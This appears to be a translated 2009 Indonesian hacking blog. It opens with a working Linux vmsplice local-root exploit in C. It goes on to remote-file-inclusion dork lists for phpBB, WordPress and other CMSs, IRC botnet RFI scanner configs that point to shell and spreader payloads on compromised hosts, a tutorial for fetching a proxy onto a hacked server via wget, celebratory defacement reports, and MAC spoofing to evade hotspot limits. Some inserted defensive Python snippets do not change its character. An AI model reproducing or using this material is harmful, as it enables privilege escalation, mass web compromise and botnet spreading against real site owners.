#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"movl %0, 0x10(%%esp) ;"
"movl %1, 0x0c(%%esp) ;"
"movl %2, 0x08(%%esp) ;"
"movl %3, 0x04(%%esp) ;"
"movl %4, 0x00(%%esp) ;"
"iret"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movl %%esp, %%eax ;"
"andl %1, %%eax ;"
"movl (%%eax), %0"
: "=r" (curr)
: "i" (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
void exit_kernel()
{
__asm__ __volatile__ (
"swapgs ;"
"movq %0, 0x20(%%rsp) ;"
"movq %1, 0x18(%%rsp) ;"
"movq %2, 0x10(%%rsp) ;"
"movq %3, 0x08(%%rsp) ;"
"movq %4, 0x00(%%rsp) ;"
"iretq"
: : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
"i" (USER_CS), "r" (exit_code)
);
}

static_inline
void * get_current()
{
unsigned long curr;
__asm__ __volatile__ (
"movq %%gs:(0), %0"
: "=r" (curr)
);
return (void *) curr;
}

#else
#error "unsupported arch"
#endif

#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

void kernel_code()
{
int i;
uint *p = get_current();

for (i = 0; i < 1024-13; i++) {
if (p[0] == uid && p[1] == uid &&
p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid &&
p[6] == gid && p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}

exit_kernel();
}

void exit_code()
{
if (getuid() != 0)
die("wtf", 0);

printf("[+] root\n");
putenv("HISTFILE=/dev/null");
execl("/bin/bash", "bash", "-i", NULL);
die("/bin/bash", errno);
}

int main(int argc, char *argv[])
{
int pi[2];
size_t map_size;
char * map_addr;
struct iovec iov;
struct page * pages[5];

uid = getuid();
gid = getgid();
setresuid(uid, uid, uid);
setresgid(gid, gid, gid);

printf("-----------------------------------\n");
printf(" Linux vmsplice Local Root Exploit\n");
printf(" By qaaz\n");
printf("-----------------------------------\n");

if (!uid || !gid)
die("!@#$", 0);

/*****/
pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
pages[1] = pages[0] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[0]);
printf("[+] page: 0x%lx\n", pages[1]);

pages[0]->flags = 1 << PG_compound;
pages[0]->private = (unsigned long) pages[0];
pages[0]->count = 1;
pages[1]->lru.next = (long) kernel_code;

/*****/
pages[2] = *(void **) pages[0];
pages[3] = pages[2] + 1;

map_size = PAGE_SIZE;
map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[2]);
printf("[+] page: 0x%lx\n", pages[3]);

pages[2]->flags = 1 << PG_compound;
pages[2]->private = (unsigned long) pages[2];
pages[2]->count = 1;
pages[3]->lru.next = (long) kernel_code;

/*****/
pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
map_size = PAGE_SIZE;
map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);
memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
printf("[+] page: 0x%lx\n", pages[4]);

/*****/
map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (map_addr == MAP_FAILED)
die("mmap", errno);

memset(map_addr, 0, map_size);
printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);

/*****/
map_size -= 2 * PAGE_SIZE;
if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
die("munmap", errno);

/*****/
if (pipe(pi) < 0) die("pipe", errno);
close(pi[0]);

iov.iov_base = map_addr;
iov.iov_len = ULONG_MAX;

signal(SIGPIPE, exit_code);
_vmsplice(pi[1], &iov, 1, 0);
die("vmsplice", errno);
return 0;
}

Download All

Monday 21 December 2009

Bug&dork New

.scan /index.php?_SERVER[DOCUMENT_ROOT]= “powered by Clicknet CMS”
.scan /include/admin.lib.inc.php?site_path= “rgboard
.scan /header.php?base_folder= “Powered by Bab.stats”
.scan /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path= “/index.php?option=com_content”
.scan /admin.php?include_path= “Guestbook”
.scan //main.php?_zb_path= “main.php”
.scan //login.php?_zb_path= “login.php”
.scan /////?_SERVER[DOCUMENT_ROOT]= “/board” site:.kr
.scan /admin.php?include_path= “gastenboek”
.scan /docebo/doceboLms//class/class.dashboard_lms.php?where_framework= “doceboLms”
.scan /encapscms_PATH/core/core.php?root= “encapscms 0.3.6″ “encapscms 0.3.6″
.scan /PNphpBB2/includes/functions_admin.php?phpbb_root_path= “/PNphpBB2/”
.scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= “PHP-NUKE”
.scan /s_loadenv.inc.php?DOCUMENT_ROOT= “netcat require”
.scan /index.php?DOCUMENT_ROOT= “netcat_files”
.scan /ray.3.5/modules/global/inc/content.inc.php?sIncPath= “boonex”
.scan /?page= /?pagedb=?
.scan ?sourcedir= index.php?sourcedir=
.scan /security/include/_class.security.php?PHPSECURITYADMIN_PATH= “web3news”
.scan /wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath= “/plugins/sniplets/”

Sunday 20 December 2009

Meffy Scanner


Albania Scanner

***************************
AUTHOR: Abah_benu
DATE: July 2008
LANGUAGE: perl (.pl)
***************************

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


my $linas_max='10';
my $sleep='1';
my $processo = "httpd -SasSL45";
my $cmd="http://henry14.isfreeweb.com/sh???";
my $id="http://henry14.isfreeweb.com/id.txt???";
my $spread="http://henry14.isfreeweb.com/spread.txt???";
my $server="irc.kamtiez.punked.us";
my $porta="7000";
my $numero=int(rand(100));
my $nick="NabiLa[".$numero."]";
my $canale="#kill-9";
my $verbot = "1.01";
my $stringa = "!scan".$numero;
my $adm = "arianom";
my $out = "".$numero;
my $c0der= "arianom"; # please leave this as it is


Download [complete + id]

Defacing malaysuck site

JAKARTA - A hacker calling himself Arianom succeeded in breaking into the supporters' forum of Malaysia's incumbent party, UMNO.

"Site Down. Stop the torture of Indonesian citizens," wrote the hacker in the message left on the site, complete with a picture of a pirate skull biting a machete.

According to okezone's investigation on Saturday (8/8/2009), the action had in fact been carried out by 'arianom' since Friday (7/8/2009) afternoon. Unfortunately, as of now the site titled 'Kelab Maya UMNO' still cannot be accessed at all.

Kelab Maya United Malaysian National Organizations (UMNO) was actually intended more as a discussion forum among UMNO supporters. The news and discussions posted there mostly revolved around the moves of UMNO's enemies, particularly Anwar Ibrahim, to bring down the party of Mahathir Muhammad and Najib Tun Razak.

In addition, news about the success of party cadres and members in entering the government cabinet also adorned the site.

Unfortunately, that success story had to give way to a strange image belonging to the hacker, Arianom, who claims to come from the hacker group 'all kill-9 crew'. (srn)

Defacing malaysian site

VIVAnews - Although the polemics over the airing of the Pendet dance in the 'Enigmatic Malaysia' advertisement on the Discovery Channel and the dispute over Jemur Island have subsided, that does not mean anti-Malaysia sentiment toward the neighbouring country has gone away.

A group of crackers calling themselves 'Arianom' took over the Malaysian site http://pkgparitraja.com on Friday, 25 September 2009, at 21:13 WIB.

According to VIVAnews' investigation, the site belongs to Pusat Kegiatan Guru Parit Raja, Batu Pahat, located at SK Pintas Puding, Km 21 Jalan Pintas Puding, 86400 Parit Raja, Batu Pahat, Johor, Malaysia.

Since Friday night, the site has been inaccessible and its appearance altered, i.e. defaced.

The page now displays the sentence 'Hacked by Arianom. This site is claimed by the people of Indonesia as retaliation for the Malaysian government's claiming of several Indonesian cultural assets.'

In the middle of the Malaysian flag, the 'jalur gemilang', the sentence "This site is claimed by the people of Indonesia. Hacked by Arianom, Kill-9 Crew." is also written.

A series of protest-like sentences is written on the page. They read as follows:

"You may call us indon. We call you malingsia, thieves of Indonesia's wealth and culture.

We urge the Malaysian government to stop and return the several cultural assets that Malaysia has claimed,

Go ahead and claim Noordin M Top; we think he is a very valuable Malaysian asset."

Before this action, precisely on the 52nd anniversary of Malaysian independence on 31 August 2009, a number of crackers defaced a number of Malaysian sites.
• VIVAnews

Saturday 19 December 2009

Rose Scanner

***************************
AUTHOR: Tukulesto
DATE: December 2008
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl

########################################
## Multi RFI - SCAN Commands ##
## By TuX_Sh4D0W ##
## Released : 11 December 2008 ##
## ---------------------------------- ##
##.---..-..-..-.,-..-..-..-. .---.. ##
##`| |'| || || . < | || || |__ | |- \##
## `-' `----'`-'`-'`----'`----'`---'`-##
##------------------------------------##
########################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;


###################
## CONFIGURATION ##
###################

my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
my $shell = "http://styrovit.ru/includes/sh.txt??";
my $pbot = "http://styrovit.ru/includes/pbotz.txt??";
my $spread = "http://www.bwdi.or.kr/bbs/spread-rose.txt??";
#my $id = "http://www.bwdi.or.kr/bbs/idrose.txt??";
#my $shell = "http://styrovit.ru/includes/sh.txt??";

@ircservers = (

"209.41.180.98",

#"localhost",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98",
#"209.41.180.98"

);


Download [complete + id]

Friday 18 December 2009

About | MIRC

IRC stands for Internet Relay Chat. Roughly speaking, IRC is a medium for talking in real time with other people on the Internet. IRC works like CB radio, except that you type everything you want to say on the keyboard and you can talk with everyone. You can also see what other people type on your monitor.

Internet Relay Chat was created in the 1980s as a result of refining communication between UNIX systems, for communicating between two or more people almost simultaneously. IRC is a network of servers that relays the conversations of the users connected to those servers. IRC networks are spread throughout the world. Anyone, anywhere, with an Internet connection can take part.

There are a great many discussion channels on IRC. You can join a discussion once you have chosen a nickname and joined a channel. If you want to try IRC, you can download mIRC from its official site.
To get started, the standard steps are as follows:

All commands begin with a slash ('/')
First connect to a server (there are many servers in the world), for example /server irc-2.texas.net
Choose a nickname, for example: /nick anakblue
To see the list of existing channels, type /list
Join a channel, for example /join #kill-9
Then talk....


The easy way... you can download ready-made scripts that come with shortcuts/short commands in all sorts of variations:

* Mirc601.exe (1.2 MB) > This is the really standard one!!
* Mr^P^.zip (1.9 MB) > (Thanks to Projo...)
* Boss2002.zip (3.2 MB)
* GeniusIRC2.exe (4.7 MB)

Make Proxy From Shell

We are probably already familiar with the thing called a proxy.... If I were to define it, a proxy is a mirror intended for private use that serves to disguise our IP address. This time I will explain a bit about how to make a proxy through the shell on a web site that has been injected.

I assume you can already inject a shell, so let's begin..

* enter the shell we injected
* look for a directory with 777 permissions using the command “find / -perm 777 -type d”; if there is none, just go straight to the /tmp directory
* wget the proxy file. The command is “wget url/file”, for example: “wget http://3xploit.110mb.com/proxy.tgz”. If that does not work, try the lwp-download or fetch command, but with the full URL, for example “lwp-download http://3xploit.110mb.com/proxy.tgz
* if that does not work either, use the injected r57 or c99 script, which has an upload feature, and upload the proxy.tgz file with it. If you do not have the file yet, just download it manually from http://3xploit.110mb.com/proxy.tgz and then upload it.
* extract the file with the command “tar -zxvf proxy.tgz”
* after extracting, enter the pro directory with the command “cd pro”
* execute the xh file; the command is “ ./xh -s ./httpd ./prox -a -d -p5050”
* check whether your proxy is alive in an IRC channel that has a bot for checking IPs, for example #kill-9 @irc.indonesiancoder.us
* the command for checking usually varies, but it is roughly like this: “.port ip 5050”, for example “.port 122.168.9.70 5050”

Notes:

* The default port above is 5050 and can be edited as desired in “menu.conf”
* This is a tutorial for creating a proxy on an injected web site
* This tutorial only works on Linux or UNIX-family machines
* All of the commands above are typed without the double quotes (”)
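Seen from the host owner's side, the procedure above leaves a process that calls itself httpd but runs from /tmp or another world-writable directory. The following is an added example (not part of the original post) that flags that masquerade in process records; the record layout and the sample values are constructed, and the /proc reader is a plain standard-library walk.

```python
import os

# Directories a dropped binary typically runs from (the post itself says /tmp or any 777 dir).
DROP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# Where a genuine system daemon binary is expected to live.
DAEMON_DIRS = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/",
               "/usr/local/sbin/", "/usr/local/bin/", "/opt/")
# Process names worth a closer look when the binary behind them is not where it should be.
DAEMON_NAMES = ("httpd", "sshd", "cron", "crond", "apache2")


def judge(pid, name, exe, cwd):
    """Return the reasons a process looks like a masquerading dropper (empty list if clean).

    name: the name the process presents (argv[0] basename, which is what ps shows and
          what renaming tricks fake); exe: resolved /proc/<pid>/exe; cwd: /proc/<pid>/cwd.
    """
    reasons = []
    if exe and exe.startswith(DROP_DIRS):
        reasons.append("executable runs from a scratch directory")
    if exe and exe.endswith(" (deleted)"):
        reasons.append("executable was unlinked after start")
    if name in DAEMON_NAMES and exe and not exe.startswith(DAEMON_DIRS):
        reasons.append("claims to be %s but binary is outside daemon paths" % name)
    if name in DAEMON_NAMES and cwd and cwd.startswith(DROP_DIRS):
        reasons.append("daemon name with working directory in scratch space")
    return reasons


def scan_records(records):
    """records: iterable of (pid, name, exe, cwd) tuples. Returns {pid: [reasons]} for hits."""
    flagged = {}
    for pid, name, exe, cwd in records:
        reasons = judge(pid, name, exe, cwd)
        if reasons:
            flagged[pid] = reasons
    return flagged


def collect_from_proc():
    """Gather (pid, name, exe, cwd) from a live Linux /proc; unreadable entries are skipped."""
    recs = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        base = "/proc/" + entry
        try:
            with open(base + "/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0")[0].decode(errors="replace")
            exe = os.readlink(base + "/exe")
            cwd = os.readlink(base + "/cwd")
        except OSError:
            continue  # kernel threads, vanished pids, or processes we may not inspect
        recs.append((int(entry), os.path.basename(argv0), exe, cwd))
    return recs


# Constructed sample: a genuine web server, a dropper renamed to httpd as in "./xh -s ./httpd",
# and an ordinary shell. Paths and pids are made up.
SAMPLE_RECORDS = [
    (512, "httpd", "/usr/sbin/httpd", "/"),
    (9731, "httpd", "/tmp/pro/prox", "/tmp/pro"),
    (9740, "bash", "/bin/bash", "/home/www"),
]

if __name__ == "__main__":
    for pid, reasons in scan_records(SAMPLE_RECORDS).items():
        print(pid, "; ".join(reasons))
```

On a real host, run `scan_records(collect_from_proc())`; anything under /tmp that presents a daemon name deserves the same follow-up as the web shell that put it there.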

Rafly Scanner

#!/usr/bin/perl

#################################
## CERME RFI Scanner Bot v2.4 ##
## By Rafly ##
## Copyleft July 2008 ##
## Usage: perl ussil.pl ##
#################################

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;

###################
## CONFIGURATION ##
###################

my $id = "http://www.urisan.tche.br/usill-id.txt?";
my $shell = "[kill-9]";
my $spread = "http://www.urisan.tche.br/bajo-spread.txt?";
my $spreads = "http://www.urisan.tche.br/usil-spreads.txt?";
#my $id = "http://www.urisan.tche.br/usill-id.txt?";
#my $shell = "http://www.urisan.tche.br/sh.txt";
@ircservers = (
"irc.indonesiancoder.us",
#"localhost",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us",
#"irc.indonesiancoder.us"
);

my $chan1 = "#kill-9";
my $chan2 = "#kill-9";
my $chan3 = "#kill-9";
my $c1k = "cerme";
my $c2k = "cerme";
my $ircd = $ircservers[rand(scalar(@ircservers))];
my $port = "6667";
my $nick = "ScanNeR[".int(rand(1000))."]";
my $ident = "Priv[".int(rand(1000))."]";
my $admin = "arianom";


Download [complete + id]

Pittbull Scanner

***************************
AUTHOR: Arianom
DATE: April 2008
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl
#
# Release Name : aria[kill-pitbull]
#
# RFi Scanner Christmas Release ! :D
#
# ------------- [% Notes %] -------------
# This rfi scanner contains piece of code from; PitBull CreW, Mic22, Inphex.
# And also lets just say more version wil come :P
#
# With this release you must be happy since its the best RFi Scanner around.

# And its even public, happy x-mas ! :D
#
# You can also PM the bot with your scan, this is handy when you have loaded multiple scanners.
#
# ------------- [% Basic Commands %] -------------
# !rfi Bug Dork ( Ex. !rfi index.php?page= "index.php?page=" ) Normal RFi Scan
# !lfi Bug Dork ( Ex. !lfi index.php?page= "index.php?page=" ) Normal LFi Scan
#
# ------------- [% Special Commands %] -------------
# !autorfiscan Bug Dork ( Ex. !autorfiscan index.php?page= "index.php?page=" ) Auto site: Scan
# !autorfipath Bug Dork ( Ex. !autorfipath page= ) Autopath scan like index.php,home.php,contact.php etc.
# !afsluiten ( Ex. !afsluiten ) make bot leave
# !info ( Ex. !info ) shows info
#
# ------------- [% Version %] -------------
# 1.0 Stable Public Release
#
# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.


use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;

#################
#[Configuration]#
#################

my $response = "http://www.emabe.com/administrator/templates/response.txt??"; # included in zip as response.txt
my $test = "http://www.emabe.com/administrator/templates/test.txt??"; # included in zip as test.txt
my $printcmd = "http://www.yourhost.com/sh.txt??";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://yourhost.com/pbotz.txt??";
my $nickname = "ngising|".(int(rand(999)));
my $ident = "RFiBeast";
my $channel = "#kill-9";
my $server = "irc.pengangguran.us.to";
my $port = 6667;

#################
#[Configuration]#
#################


Download [complete + id]

Thursday 17 December 2009

SQL Injection Attacks by Example

A customer asked that we check out his intranet site, which was used by the company's employees and customers. This was part of a larger security review, and though we'd not actually used SQL injection to penetrate a network before, we were pretty familiar with the general concepts. We were completely successful in this engagement, and wanted to recount the steps taken as an illustration.

"SQL Injection" is a subset of the unverified/unsanitized user input vulnerability ("buffer overflows" are a different subset), and the idea is to convince the application to run SQL code that was not intended. If the application is creating SQL strings naively on the fly and then running them, it's straightforward to create some real surprises.

We'll note that this was a somewhat winding road with more than one wrong turn, and others with more experience will certainly have different -- and better -- approaches. But the fact that we were successful does suggest that we were not entirely misguided.

There have been other papers on SQL injection, including some that are much more detailed, but this one shows the rationale of discovery as much as the process of exploitation.
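The "SQL strings created naively on the fly" the article describes, beside the parameterised form that removes the problem, as an added example that is not part of the original article; the user table and inputs are constructed, using SQLite in memory.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the intranet application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice@example.com", "Alice"), ("bob@example.com", "Bob")])
    return conn


def lookup_naive(conn, email):
    """The pattern the article warns about: the query text is assembled from the input,
    so the database parses whatever the user typed as SQL."""
    sql = "SELECT name FROM users WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterised(conn, email):
    """Hardened form: the value is bound by the driver and never parsed as SQL,
    so a quote in the input is just a character in the comparison."""
    return [row[0] for row in
            conn.execute("SELECT name FROM users WHERE email = ?", (email,))]


def probe(conn, email):
    """Run both lookups on one input and report what each returned (or raised)."""
    try:
        naive = lookup_naive(conn, email)
    except sqlite3.Error as exc:
        naive = "error: " + str(exc)
    return {"naive": naive, "param": lookup_parameterised(conn, email)}


if __name__ == "__main__":
    db = make_db()
    # A legitimate address containing an apostrophe already breaks the naive version.
    print(probe(db, "o'brien@example.com"))
    # Input that closes the string and appends a condition returns every row.
    print(probe(db, "x' OR '1'='1"))
```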

Wednesday 16 December 2009

Bug Dork PHPBB

/path/authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=
/language/lang_german/lang_main_album.php?phpbb_root_path=
link_main.php?phpbb_root_path=
/inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=
MOD_forum_fields_parse.php?phpbb_root_path=
/codebb/pass_code.php?phpbb_root_path=
/codebb/lang_select?phpbb_root_path=
includes/functions_nomoketos_rules.php?phpbb_root_path=
includes/functions.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/ezconvert/config.php?ezconvert_dir=
/includes/class_template.php?phpbb_root_path=
/includes/usercp_viewprofile.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
menu.php?sesion_idioma=
/includes/functions.php?phpbb_root_path=
/admin/admin_linkdb.php?phpbb_root_path=
/admin/admin_forum_prune.php?phpbb_root_path=
/admin/admin_extensions.php?phpbb_root_path=
/admin/admin_board.php?phpbb_root_path=
/admin/admin_attachments.php?phpbb_root_path=
/admin/admin_users.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/admin/modules_data.php?phpbb_root_path=
/faq.php?foing_root_path=
/index.php?foing_root_path=
/list.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/gen_m3u.php?foing_root_path=
/view_artist.php?foing_root_path=
/view_song.php?foing_root_path=
/login.php?foing_root_path=
/playlist.php?foing_root_path=
/song.php?foing_root_path=
/flash/set_na.php?foing_root_path=
/flash/initialise.php?foing_root_path=
/flash/get_song.php?foing_root_path=
/includes/common.php?foing_root_path=
/admin/nav.php?foing_root_path=
/admin/main.php?foing_root_path=
/admin/list_artists.php?foing_root_path=
/admin/index.php?foing_root_path=
/admin/genres.php?foing_root_path=
/admin/edit_artist.php?foing_root_path=
/admin/edit_album.php?foing_root_path=
/admin/config.php?foing_root_path=
/admin/admin_status.php?foing_root_path=
language/lang_english/lang_prillian_faq.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/language/lang_french/lang_prillian_faq.php?phpbb_root_path=
/includes/archive/archive_topic.php?phpbb_root_path=
/functions_rpg_events.php?phpbb_root_path=
/admin/admin_spam.php?phpbb_root_path=
/includes/functions_newshr.php?phpbb_root_path=
/zufallscodepart.php?phpbb_root_path=
/mods/iai/includes/constants.php?phpbb_root_path=
/root/includes/antispam.php?phpbb_root_path=
/phpBB2/shoutbox.php?phpbb_root_path=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/journals_delete.php?phpbb_root_path=
/includes/journals_post.php?phpbb_root_path=
/includes/journals_edit.php?phpbb_root_path=
/includes/functions_num_image.php?phpbb_root_path=
/includes/functions_user_viewed_posts.php?phpbb_root_path=
/includes/themen_portal_mitte.php?phpbb_root_path=
/includes/logger_engine.php?phpbb_root_path=
/includes/functions_static_topics.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=
/includes/functions_kb.php?phpbb_root_path=
/includes/bbcb_mg.php?phpbb_root_path=
/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=
/includes/pafiledb_constants.php?module_root_path=
/index.php?phpbb_root_path=
/song.php?phpbb_root_path=
/faq.php?phpbb_root_path=
/list.php?phpbb_root_path=
/gen_m3u.php?phpbb_root_path=
/playlist.php?phpbb_root_path=
/language/lang_english/lang_activity.php?phpbb_root_path=
/blend_data/blend_common.php?phpbb_root_path=
/modules/Forums/admin/index.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_board.php?phpbb_root_path=
/modules/Forums/admin/admin_disallow.php?phpbb_root_path=
/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=
/modules/Forums/admin/admin_groups.php?phpbb_root_path=
/modules/Forums/admin/admin_ranks.php?phpbb_root_path=
/modules/Forums/admin/admin_styles.php?phpbb_root_path=
/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=
/modules/Forums/admin/admin_words.php?phpbb_root_path=
/modules/Forums/admin/admin_avatar.php?phpbb_root_path=
/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=
/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=
/modules/Forums/admin/admin_forums.php?phpbb_root_path=
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=
/modules/Forums/admin/admin_smilies.php?phpbb_root_path=
/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=
/modules/Forums/admin/admin_users.php?phpbb_root_path=
/stat_modules/users_age/module.php?phpbb_root_path=
/includes/functions_cms.php?phpbb_root_path=
/m2f/m2f_phpbb204.php?m2f_root_path=
/m2f/m2f_forum.php?m2f_root_path=
/m2f/m2f_mailinglist.php?m2f_root_path=
/m2f/m2f_cron.php?m2f_root_path=
/lib/phpbb.php?subdir=
/includes/functions_mod_user.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_portal.php?phpbb_root_path=
/includes/functions.php?phpbb_root_path=
/includes/functions_admin.php?phpbb_root_path=
/toplist.php?f=toplist_top10&phpbb_root_path=
/admin/addentry.php?phpbb_root_path=
/includes/kb_constants.php?module_root_path=
/auth/auth.php?phpbb_root_path=
/auth/auth_phpbb/phpbb_root_path=
/auction/auction_common.php?phpbb_root_path=
/auth/auth_SMF/smf_root_path=
/auth/auth.php?smf_root_path=

Tuesday 15 December 2009

Bug Dork WordPress

index/wp-content/plugins/Enigma2.php?boarddir=
mygallery/myfunctions/mygallerybrowser.php?myPath=
plugins/wp-table/js/wptable-button.phpp?wpPATH=
plugins/wordtube/wordtube-button.php?wpPATH=
plugins/myflash/myflash-button.php?wpPATH=
plugins/BackUp/Archive.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=
plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=
plugins/sniplets/modules/syntax_highlight.php?libpath=

Bajo Scanner

***************************
AUTHOR: arianom
DATE: December 2009
LANGUAGE: perl (.pl)
***************************

#!/usr/bin/perl
$process = "/usr/sbin/arianom";
my $printcmd = "http://kill-nine.co.nr??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $spreads = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $ircserver = "irc.indonesiancoder.us";
my $start = "!scan";
my $port = "6667";
my $nickname = "sedih" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Pbot RFI Scanner v1.0 beta";


print "\n";
print " Priv 8 Scanner\n";
print " Author: Arianom\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";

use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;


Download [complete + id]

HACK WIFI

Sometimes when you're happily surfing at a hotspot the connection suddenly drops... supposedly it's time-limited so the user can't access the Internet anymore.... Wow, what a hassle... all we want is to get information on the Internet... and all our activity gets restricted... crazy... ahhhhh... self-restriction... so when will the Indonesian people be able to get free information on the Internet... when will the whole Internet sector stop being turned into a business arena... this is what makes Indonesians distrust the Internet... and get fooled by other nations... in developed countries Internet access is unlimited and FREE... yes, once again, FREE... only here is it made a source of inspiration for businesspeople to rake in as much profit as they can... even though we Indonesians are so thirsty for knowledge, especially about computers, when else... hihihihihi... okay, to get around this there are tips and tricks to change the MAC so we can roam the cyber world freely hihihihi...

Okay.... Straight to the point... first, find a hotspot... preferably one that provides free hotspot access but is only limited by hours..., then just play until the time runs out...

well, after that there will be an access restriction like the one shown in the picture above.. or a message saying “SORRY, YOUR INTERNET TIME IS UP, PLEASE COME BACK TOMORROW”, damn!!!!! when will Indonesia progress if the Internet keeps being restricted... well, like it or not, it gets worked around.

THE TIME-LIMITING PROCESS

the time limit can be enforced by the access point in that cafe, and usually the restriction uses the MAC address. Why the MAC address??? Why not the IP address?? umh... an IP address can be changed yourself through the computer, but the MAC, maybe on Linux, but on Windows??? well, download a program to change the MAC at:

click here to download the TMAC software
then install and run it, and something like the following picture will appear:

then click the CHANGE MAC button to change the MAC address, then click RANDOM MAC ADDRESS,
well... the MAC address will then be randomized according to the program's proper method, then click CHANGE NOW!, and your IP address changes right away.

